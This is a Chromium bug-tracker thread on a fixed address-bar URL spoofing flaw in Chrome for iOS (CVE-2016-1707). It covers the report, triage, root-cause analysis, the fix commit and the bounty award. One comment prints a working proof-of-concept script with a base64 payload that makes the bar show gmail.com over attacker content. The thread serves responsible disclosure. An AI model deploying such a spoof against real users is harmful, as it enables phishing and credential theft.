New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 622183 link

Starred by 1 user

Issue metadata

Status: Verified
Owner:
Closed: Jun 2016
Cc:
EstimatedDays: ----
NextAction: ----
OS: iOS
Pri: 1
Type: Bug-Security



Sign in to add a comment

Security: Chrome Address Bar URL spoofing on IOS

Reported by xis...@gmail.com, Jun 22 2016

Issue description

Agent:
Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/51.0.2704.64 Mobile/13G21 Safari/601.1.4


DESCRIPTION:

Chrome Address Bar URL spoofing on IOS

POC:

http://xisigr.com/test/spoof/chrome/1.html
http://xisigr.com/test/spoof/chrome/2.html


 
spoof-1.jpg
96.3 KB View Download
spoof-2.jpg
46.6 KB View Download

Comment 1 by xis...@gmail.com, Jun 22 2016

POC:
<script>

payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=";

function pwned() {
    var t = window.open('https://www.gmail.com', 'aaaa');
    t.document.write(atob(payload));
    t.document.write("<h1>Address bar says https://www.gmail.com - this is NOT https://www.gmail.com</h1>");
    
}

</script>
<a href="https://hack.com::/"  target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br>

base64 payload code:
<body></body>
<script>
    var link = document.createElement('a');
    link.href = 'https://gmail.com::';
    document.body.appendChild(link);
    link.click();
</script>
Components: Security>UX
Labels: OS-iOS
Owner: palmer@chromium.org
This appears to be the same idea as  issue 599956 . Since the page is actually loaded at about:blank, trying to grab cookies or the like won't work. +palmer to confirm

Comment 3 by palmer@chromium.org, Jun 22 2016

Cc: pinkerton@chromium.org pkl@chromium.org
Labels: Security_Severity-High Security_Impact-Stable M-53
Owner: eugene...@chromium.org
Status: Assigned (was: Unconfirmed)
The attack payload is:

```
<body></body>
<script>
    var link = document.createElement('a');
    link.href = 'https://gmail.com::';
    document.body.appendChild(link);
    link.click();
</script>
```

According to the severity guidelines (https://www.chromium.org/developers/severity-guidelines): "An address bar spoof where only certain URLs can be displayed, or with other mitigating factors (265221)." would be Medium. But this PoC is not subject to any such mitigations, so it's a very nice phishing attack.

eugenebut, pkl, pinkerton: Could one of you please identify an appropriate owner for this bug? Thanks!
I am a good owner for this bug.
Status: Started (was: Assigned)

Comment 6 Deleted

Labels: ReleaseBlock-Stable M-52
Cc: kkhorimoto@chromium.org
Here is what's actually happening:
1.) decidePolicyForNavigationAction: called with 'https://gmail.com::' and chrome allows the load
2.) didStartProvisionalNavigation: called with 'https://gmail.com::' which chrome adds as a pending entry. 
3.) didCommitNavigation: called with 'about:blank' but chrome commits pending entry ('https://gmail.com::') and promotes it as a last committed URL
4.) didFinishNavigation: called
Project Member

Comment 10 by sheriffbot@chromium.org, Jun 23 2016

Labels: Pri-1
Labels: Merge-Request-52 Merge-Request-53
Status: Fixed (was: Started)
Project Member

Comment 12 by sheriffbot@chromium.org, Jun 24 2016

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: -Merge-Request-53 Merge-Request-51
Labels: -Merge-Request-51 -Merge-Request-52 Merge-Approved-52 Merge-Approved-51
Project Member

Comment 16 by bugdroid1@chromium.org, Jun 24 2016

Labels: -merge-approved-52 merge-merged-2743
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5

commit 5967e8c0fe0b1e11cc09d6c88304ec504e909fd5
Author: Eugene But <eugenebut@google.com>
Date: Fri Jun 24 17:52:58 2016

[ios] Do not commit invalid URLs during web load.

BUG= 622183 

Review-Url: https://codereview.chromium.org/2086333003
Cr-Commit-Position: refs/heads/master@{#401761}
(cherry picked from commit c2d2b0f2f74dad0bdef196cf1657f0d584cbe3a7)

Review URL: https://codereview.chromium.org/2096023002 .

Cr-Commit-Position: refs/branch-heads/2743@{#467}
Cr-Branched-From: 2b3ae3b8090361f8af5a611712fc1a5ab2de53cb-refs/heads/master@{#394939}

[modify] https://crrev.com/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5/ios/web/web_state/ui/crw_web_controller.mm

Cc: cma...@chromium.org
Labels: -Merge-Approved-51
This does not need to be merged to M51
Labels: reward-topanel Release-0-M52
Thanks for your report. We'll consider your report under the Chrome Reward Program for a security cash reward - full details here: https://www.google.com/about/appsecurity/chrome-rewards/

We'll update you once we have a decision. Feel free to check in with me in a few weeks if you haven't heard back, either by updating this bug or reaching out to me at awhalley@
Cc: srikanthg@chromium.org
Labels: -reward-topanel reward-3000
Congratulations, the panel decided to award $3,000 for this bug!  Our finance team will be in touch within a few weeks to arrange the details.

<boilerplate>
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an established charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.</boilerplate>

Labels: reward-unpaid

Comment 23 by xis...@gmail.com, Jul 14 2016

Thanks! Credit as "xisigr of Tencent's Xuanwu Lab" would be good.
Labels: -reward-unpaid reward-inprocess
Status: Verified (was: Fixed)
I ran both POC's reported in comment#0 and the issue is now fixed.
about:blank is displayed in both the cases.
Verified on M52.0.2743.82 beta, M53.0.2785.22 beta versions.
Devices: iPad Air2, iPad mini, iPhone6 plus, iPhone6s.
iOS: 9.3.2, 10.0

One observation here is: Both of these tests are not reproducible on the current stable version of Chrome (M51) on iOS10 (i.e even without fix).
Labels: CVE-2016-1707
Labels: -ReleaseBlock-Stable
Project Member

Comment 28 by sheriffbot@chromium.org, Sep 30 2016

Labels: -Restrict-View-SecurityNotify
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 29 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 30 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label
Labels: CVE_description-submitted

Sign in to add a comment